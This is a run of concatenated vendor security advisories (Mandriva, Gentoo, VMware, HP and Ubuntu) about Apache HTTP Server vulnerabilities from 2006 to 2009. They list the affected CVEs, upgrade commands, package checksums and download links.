 941a32aea1b1b3bca1ae343d5d925892  corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.1.20060mlcs4.x86_64.rpm
 1d79a7b921ce150de88e22ffbaba4b31  corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.1.20060mlcs4.x86_64.rpm
 d80b9ffca3dd024e73d069e55ba7fa3e  corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.1.20060mlcs4.x86_64.rpm
 7a7a11645680a7bee9cf88b166b0d32f  corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm
 fcc85c0f9faf1fa08a01f3d4ecb68033  corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm
 55789d16ff565bcd31dfa522435d4d4b  corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.1.20060mlcs4.x86_64.rpm
 7ee708824d65878b71ede35e139ac94d  corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm
 e8579835f848cade641da14354196497  corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.1.20060mlcs4.x86_64.rpm
 6a1e70a638aecf603f3bc2485d14bd78  corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.1.20060mlcs4.x86_64.rpm
 212f40574d0821b909972ebc36fb697a  corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.1.20060mlcs4.x86_64.rpm
 32a8dd886e42c8093be05c9ee4d31855  corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.1.20060mlcs4.x86_64.rpm
 265bccd86baa7fca942f1c6d4d694523  corporate/4.0/x86_64/apache-modules-2.2.3-1.1.20060mlcs4.x86_64.rpm
 babdb585a6c754f23d91c41fc844a5e2  corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.1.20060mlcs4.x86_64.rpm
 63274f5c5dc3897d0062f621b1c63e0e  corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.1.20060mlcs4.x86_64.rpm
 18782a1fcbcb760d36162ce830ac4cdd  corporate/4.0/x86_64/apache-source-2.2.3-1.1.20060mlcs4.x86_64.rpm 
 8cdf592a822485abba00dfb6591615ea  corporate/4.0/SRPMS/apache-2.2.3-1.1.20060mlcs4.src.rpm
 _______________________________________________________________________
 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you. 
 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:
  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
 You can view other update advisories for Mandriva Linux at:
  http://www.mandriva.com/security/advisories
 If you want to report vulnerabilities, please contact
  security_(at)_mandriva.com
 _______________________________________________________________________
 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFGjD3WmqjQ0CJFipgRAtGoAKCXMGCKCMbkso0ugvF0TpsWNwkPjgCfVakS
Re00IyLecNs4MIGgsrv2qJE=
=5EEm
-----END PGP SIGNATURE-----
. 
Affected packages
=================
    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-servers/apache       < 2.2.6                    *>= 2.0.59-r5
                                                              >= 2.2.6
Description
===========
Multiple cross-site scripting vulnerabilities have been discovered in
mod_status and mod_autoindex (CVE-2006-5752, CVE-2007-4465). An error
has been discovered in the recall_headers() function in mod_mem_cache
(CVE-2007-1862). The mod_cache module does not properly sanitize
requests before processing them (CVE-2007-1863). The Prefork module
does not properly check PID values before sending signals
(CVE-2007-3304). The mod_proxy module does not correctly check headers
before processing them (CVE-2007-3847). 
Impact
======
A remote attacker could exploit one of these vulnerabilities to inject
arbitrary script or HTML content, obtain sensitive information or cause
a Denial of Service. 
Workaround
==========
There is no known workaround at this time. 
Resolution
==========
All Apache users should upgrade to the latest version:
    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-servers/apache-2.0.59-r5"
References
==========
  [ 1 ] CVE-2006-5752
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752
  [ 2 ] CVE-2007-1862
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1862
  [ 3 ] CVE-2007-1863
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863
  [ 4 ] CVE-2007-3304
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304
  [ 5 ] CVE-2007-3847
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3847
  [ 6 ] CVE-2007-4465
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4465
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
  http://security.gentoo.org/glsa/glsa-200711-06.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org. 
License
=======
Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s). 
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
. Summary
   Updated VMware Hosted products address security issues in libpng and
   the Apace HTTP Server. 
2. Relevant releases
   VMware Workstation 6.5.2 and earlier,
   VMware Player 2.5.2 and earlier,
   VMware ACE 2.5.2 and earlier
3. Problem Description
 a. Third Party Library libpng Updated to 1.2.35
    Several flaws were discovered in the way third party library libpng
    handled uninitialized pointers. An attacker could create a PNG image
    file in such a way, that when loaded by an application linked to
    libpng, it could cause the application to crash or execute arbitrary
    code at the privilege level of the user that runs the application. 
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2009-0040 to this issue. 
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available. 
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    Workstation    6.5.x     any      6.5.3 build 185404 or later
    Player         2.5.x     any      2.5.3 build 185404 or later
    ACE            2.5.x     any      2.5.3 build 185404 or later
    Server         2.x       any      patch pending
    Server         1.x       any      patch pending
    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X not affected
    ESXi           4.0       ESXi     not affected
    ESXi           3.5       ESXi     not affected
    ESX            4.0       ESX      not affected
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected *
    * The libpng update for the Service Console of ESX 2.5.5 is
    documented in VMSA-2009-0007. 
 b. Apache HTTP Server updated to 2.0.63
    The new version of ACE updates the Apache HTTP Server on Windows
    hosts to version 2.0.63 which addresses multiple security issues
    that existed in the previous versions of this server. 
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the names CVE-2007-3847, CVE-2007-1863, CVE-2006-5752,
    CVE-2007-3304, CVE-2007-6388, CVE-2007-5000, CVE-2008-0005 to the
    issues that have been addressed by this update. 
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available. 
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    Workstation    6.5.x     any      not affected
    Player         2.5.x     any      not affected
    ACE            2.5.x     Windows  2.5.3 build 185404 or later
    ACE            2.5.x     Linux    update Apache on host system *
    Server         2.x       any      not affected
    Server         1.x       any      not affected
    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X not affected
    ESXi           4.0       ESXi     not affected
    ESXi           3.5       ESXi     not affected
    ESX            4.0       ESX      not affected
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected
    * The Apache HTTP Server is not part of an ACE install on a Linux
    host. Update the Apache HTTP Server on the host system to version
    2.0.63 in order to remediate the vulnerabilities listed above. 
4. Solution
   Please review the patch/release notes for your product and version
   and verify the md5sum and/or the sha1sum of your downloaded file. 
   VMware Workstation 6.5.3
   ------------------------
   http://www.vmware.com/download/ws/
   Release notes:
   http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html
   For Windows
   Workstation for Windows 32-bit and 64-bit
   Windows 32-bit and 64-bit .exe
   md5sum: 7565d16b7d7e0173b90c3b76ca4656bc
   sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1
   For Linux
   Workstation for Linux 32-bit
   Linux 32-bit .rpm
   md5sum: 4d55c491bd008ded0ea19f373d1d1fd4
   sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e
   Workstation for Linux 32-bit
   Linux 32-bit .bundle
   md5sum: d4a721c1918c0e8a87c6fa4bad49ad35
   sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5
   Workstation for Linux 64-bit
   Linux 64-bit .rpm
   md5sum: 72adfdb03de4959f044fcb983412ae7c
   sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb
   Workstation for Linux 64-bit
   Linux 64-bit .bundle
   md5sum: 83e1f0c94d6974286256c4d3b559e854
   sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542
   VMware Player 2.5.3
   -------------------
   http://www.vmware.com/download/player/
   Release notes:
   http://www.vmware.com/support/player25/doc/releasenotes_player253.html
   Player for Windows binary
http://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.exe
   md5sum: fe28f193374c9457752ee16cd6cad4e7
   sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04
   Player for Linux (.rpm)
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.rpm
   md5sum: c99cd65f19fdfc7651bcb7f328b73bc2
   sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e
   Player for Linux (.bundle)
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.bundle
   md5sum: 210f4cb5615bd3b2171bc054b9b2bac5
   sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b
   Player for Linux - 64-bit (.rpm)
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.rpm
   md5sum: f91576ef90b322d83225117ae9335968
   sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974
   Player for Linux - 64-bit (.bundle)
http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.bundle
   md5sum: 595d44d7945c129b1aeb679d2f001b05
   sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4
   VMware ACE 2.5.3
   ----------------
   http://www.vmware.com/download/ace/
   Release notes:
   http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html
   ACE Management Server Virtual Appliance
   AMS Virtual Appliance .zip
   md5sum: 44cc7b86353047f02cf6ea0653e38418
   sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1
   VMware ACE for Windows 32-bit and 64-bit
   Windows 32-bit and 64-bit .exe
   md5sum: 0779da73408c5e649e0fd1c62d23820f
   sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef
   ACE Management Server for Windows
   Windows .exe
   md5sum: 0779da73408c5e649e0fd1c62d23820f
   sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef
   ACE Management Server for SUSE Enterprise Linux 9
   SLES 9 .rpm
   md5sum: a4fc92d7197f0d569361cdf4b8cca642
   sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75
   ACE Management Server for Red Hat Enterprise Linux 4
   RHEL 4 .rpm
   md5sum: 841005151338c8b954f08d035815fd58
   sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e
5. Change log
2009-08-20  VMSA-2009-0010
Initial security advisory after release of Workstation 6.5.3,
Player 2.5.3, and ACE 2.5.3 on 2009-08-20. 
- ------------------------------------------------------------------------
7. Contact
E-mail list for product security notifications and announcements:
http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce
This Security Advisory is posted to the following lists:
  * security-announce at lists.vmware.com
  * bugtraq at securityfocus.com
  * full-disclosure at lists.grok.org.uk
E-mail:  security at vmware.com
PGP key at: http://kb.vmware.com/kb/1055
VMware Security Center
http://www.vmware.com/security
VMware security response policy
http://www.vmware.com/support/policies/security_response.html
General support life cycle policy
http://www.vmware.com/support/policies/eos.html
VMware Infrastructure support life cycle policy
http://www.vmware.com/support/policies/eos_vi.html
Copyright 2009 VMware Inc.  All rights reserved. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01178795
Version: 1
HPSBUX02262 SSRT071447 rev. 1 - HP-UX running Apache, Remote Arbitrary Code Execution, Cross Site Scripting (XSS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. 
Release Date: 2007-10-02
Last Updated: 2007-10-02
Potential Security Impact: Remote arbitrary code execution, cross site scripting (XSS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with Apache running on HP-UX. The vulnerabilities could be exploited remotely via Cross Site Scripting (XSS) to execute arbitrary code. 
References: CVE-2005-2090, CVE-2006-5752, CVE-2007-0450, CVE-2007-0774, CVE-2007-1355, CVE-2007-1358, CVE-2007-1860, CVE-2007-1863, CVE-2007-1887, CVE-2007-1900, CVE-2007-2449, CVE-2007-2450, CVE-2007-2756, CVE-2007-2872, CVE-2007-3382, CVE-2007-3385, CVE-2007-3386. 
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. 
HP-UX B.11.11, B.11.23, B.11.31 running Apache
BACKGROUND
To determine if a system has an affected version, search the output of "swlist -a revision -l fileset" for an affected fileset. Then determine if the recommended patch or update is installed. 
AFFECTED VERSIONS 
For IPv4: 
HP-UX B.11.11 
============= 
hpuxwsAPACHE 
action: install revision A.2.0.59.00 or subsequent 
restart Apache 
URL: https://www.hp.com/go/softwaredepot/ 
For IPv6: 
HP-UX B.11.11 
HP-UX B.11.23 
HP-UX B.11.31 
============= 
hpuxwsAPACHE,revision=B.1.0.00.01 
hpuxwsAPACHE,revision=B.1.0.07.01 
hpuxwsAPACHE,revision=B.1.0.08.01 
hpuxwsAPACHE,revision=B.1.0.09.01 
hpuxwsAPACHE,revision=B.1.0.10.01 
hpuxwsAPACHE,revision=B.2.0.48.00 
hpuxwsAPACHE,revision=B.2.0.49.00 
hpuxwsAPACHE,revision=B.2.0.50.00 
hpuxwsAPACHE,revision=B.2.0.51.00 
hpuxwsAPACHE,revision=B.2.0.52.00 
hpuxwsAPACHE,revision=B.2.0.53.00 
hpuxwsAPACHE,revision=B.2.0.54.00 
hpuxwsAPACHE,revision=B.2.0.55.00 
hpuxwsAPACHE,revision=B.2.0.56.00 
hpuxwsAPACHE,revision=B.2.0.58.00 
hpuxwsAPACHE,revision=B.2.0.58.01 
action: install revision B.2.0.59.00 or subsequent 
restart Apache 
URL: https://www.hp.com/go/softwaredepot/ 
END AFFECTED VERSIONS 
RESOLUTION
HP has made the following available to resolve the vulnerability. 
HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent. 
The update is available on https://www.hp.com/go/softwaredepot/ 
Note: HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin contains HP-UX Apache-based Web Server v.2.0.59.00. 
MANUAL ACTIONS: Yes - Update 
Install HP-UX Apache-based Web Server v.2.18 powered by Apache Tomcat Webmin or subsequent. 
PRODUCT SPECIFIC INFORMATION 
HP-UX Software Assistant: 
HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. 
For more information see: https://www.hp.com/go/swa 
HISTORY 
Revision: 1 (rev.1) - 02 October 2007 Initial release 
Third Party Security Patches: 
Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 
Support: For further information, contact normal HP Services support channel. 
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue. 
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save. 
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. 
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. 
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
\xa9Copyright 2007 Hewlett-Packard Development Company, L.P. 
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. 
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBRwVCruAfOvwtKn1ZEQK1YgCfavU7x1Hs59uLdP26lpZFwMxKofIAn3gJ
HHoe3AY1sc6hrW3Xk+B1hcbr
=+E1W
-----END PGP SIGNATURE-----
. =========================================================== 
Ubuntu Security Notice USN-499-1            August 16, 2007
apache2 vulnerabilities
CVE-2006-5752, CVE-2007-1863, CVE-2007-3304
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
Ubuntu 7.04
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu. 
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
  apache2-common                           2.0.55-4ubuntu2.2
  apache2-mpm-prefork                      2.0.55-4ubuntu2.2
  apache2-mpm-worker                       2.0.55-4ubuntu2.2
Ubuntu 6.10:
  apache2-common                           2.0.55-4ubuntu4.1
  apache2-mpm-prefork                      2.0.55-4ubuntu4.1
  apache2-mpm-worker                       2.0.55-4ubuntu4.1
Ubuntu 7.04:
  apache2-mpm-prefork                      2.2.3-3.2ubuntu0.1
  apache2-mpm-worker                       2.2.3-3.2ubuntu0.1
  apache2.2-common                         2.2.3-3.2ubuntu0.1
In general, a standard system upgrade is sufficient to effect the
necessary changes. 
Details follow:
Stefan Esser discovered that mod_status did not force a character set,
which could result in browsers becoming vulnerable to XSS attacks when
processing the output.  If a user were tricked into viewing server
status output during a crafted server request, a remote attacker could
exploit this to modify the contents, or steal confidential data (such as
passwords), within the same domain.  By default, mod_status is disabled
in Ubuntu. (CVE-2006-5752)
Niklas Edmundsson discovered that the mod_cache module could be made to
crash using a specially crafted request.  A remote user could use this
to cause a denial of service if Apache was configured to use a threaded
worker.  By default, mod_cache is disabled in Ubuntu. (CVE-2007-1863)
A flaw was discovered in the signal handling of Apache.  A local
attacker could trick Apache into sending SIGUSR1 to other processes. 
The vulnerable code was only present in Ubuntu Feisty. (CVE-2007-3304)
Updated packages for Ubuntu 6.06 LTS:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2.diff.gz
      Size/MD5:   115882 e94e45574e3b131d3a9a0e07e193f1e5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2.dsc
      Size/MD5:     1148 c2bc143625fbf8ca59fea300845c5a42
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz
      Size/MD5:  6092031 45e32c9432a8e3cf4227f5af91b03622
  Architecture independent packages:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.2_all.deb
      Size/MD5:  2124364 9b8ca5d5757c63f5ee6bbd507f0a8357
  amd64 architecture (Athlon64, Opteron, EM64T Xeon)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   833000 be4c7770c725f5f4401ca06d1347211f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   227832 41c12dfe84f109e6544a33e4e1d791a8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   222934 7e4d072bad27239e366a6eda94c09190
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   227576 8fc59f78a3fa0e5d6dac81e875039bda
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   171082 4318f93373b705563251f377ed398614
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   171860 257f4183d70be5a00546c39c5a18f108
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:    93916 695cee55f91ceb9424abe31d8b6ee1dd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:    35902 00c1082a77ff1d863f72874c4472a26d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   285336 0a8510634b21f56f0d9619aa6fc9cec9
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_amd64.deb
      Size/MD5:   143952 d75f83ac219bce95a15a8f44b82b8ea7
  i386 architecture (x86 compatible Intel/AMD)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   786186 4e78fa0d438867194f66b11b4eb6fc2e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   202448 74cf60884e18c1fc93f157010a15b12c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   198456 209a0b92995fec453ed4c2c181e3e555
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   202038 6cbd437caf993fa2b2b38369cd3d5863
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   171074 0a5a26aa58af7aa2d51d1cf5d7c543d6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   171848 af9ca78febc5bc0c7936296dab958349
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:    91884 2857d60b507b28c736f83815c9f3d1b8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:    35906 202b5b233af0d26e29ca7302cf7fd04c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   261418 c90342706ac26682d15032a5ba5cb51a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_i386.deb
      Size/MD5:   131850 951a4573901bc2f10d5febf940d57516
  powerpc architecture (Apple Macintosh G3/G4/G5)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   859126 afdd8642ca447fc9dc70dfed92be0fa6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   219898 6d9c9f924d2356bf9d3438a280870a7d
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   215602 dd554132cdea0f860e01cf5d4e0dbc7c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   219378 7a1f4b325dacef287c901fa66680c04e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   171096 a0e2547d38ef1b84dc419d69e42ffa0b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   171864 200ab662b2c13786658486df37fda881
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   103628 ae36642fbd4698bb362fa4bf9417b0e3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:    35910 358027282f2f19451d3aa784dc0474dc
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   280950 0d9b56ec076da25e2a03f6d3c6445057
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_powerpc.deb
      Size/MD5:   141074 f5d3d5e0e5911e0c0156ae55af50f87b
  sparc architecture (Sun SPARC/UltraSPARC)
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   803440 d66da6a91c08956c3c5062668349ef41
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   209970 57f0a8f823a4502ee9a2608e3181cc81
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   205582 1dcfb0df796e85c409f614544ea589fe
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   209330 6bf7ae824eea35d3487febef384fce91
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   171080 1088337f4abcb6c8f65751b6120c2307
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   171868 5cda04cd73a9c6d8dfc18abd55c09ebd
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:    92972 850ab3bb0904e8fe9b6255c42ba7f84c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:    35904 7af260b95c4faa17ef34810fed888caf
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   267550 08182a8a2cab00fc0e6bca2cccf5165f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.2_sparc.deb
      Size/MD5:   129760 a60606c6d2f12209b0bdae997be4a13f
Updated packages for Ubuntu 6.10:
  Source archives:
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1.diff.gz
      Size/MD5:   116265 2732761b18dfb3c2cd1aa0b54c2cf623
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu4.1.dsc
      Size/MD5:     1148 4b9c4612469c521db0c5fdbe2f6b9b25
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz
      Size/MD5:  6092031 45e32c9432a8e3cf4227f5af91b03622
  Architecture independent packages:
